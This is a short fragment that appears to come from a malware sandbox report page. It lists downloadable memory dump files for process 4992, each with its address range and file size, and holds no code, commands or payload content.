Filesize
408KB

Download
memory/4992-156-0x0000000007100000-0x0000000007108000-memory.dmp

Filesize
32KB

Download
memory/4992-154-0x00000000070C0000-0x00000000070CE000-memory.dmp

Filesize
56KB

Download
memory/4992-147-0x0000000006130000-0x0000000006162000-memory.dmp

Filesize
200KB

Download
memory/4992-143-0x00000000052C0000-0x00000000052E2000-memory.dmp

Filesize
136KB

Download
memory/4992-142-0x0000000004C20000-0x0000000005248000-memory.dmp

Filesize
6.2MB

Download
memory/4992-141-0x00000000045B0000-0x00000000045E6000-memory.dmp

Filesize
216KB

Download
memory/4992-158-0x00000000080F0000-0x0000000008694000-memory.dmp

Filesize
5.6MB

Download
memory/4992-155-0x0000000007110000-0x000000000712A000-memory.dmp

Filesize
104KB

Download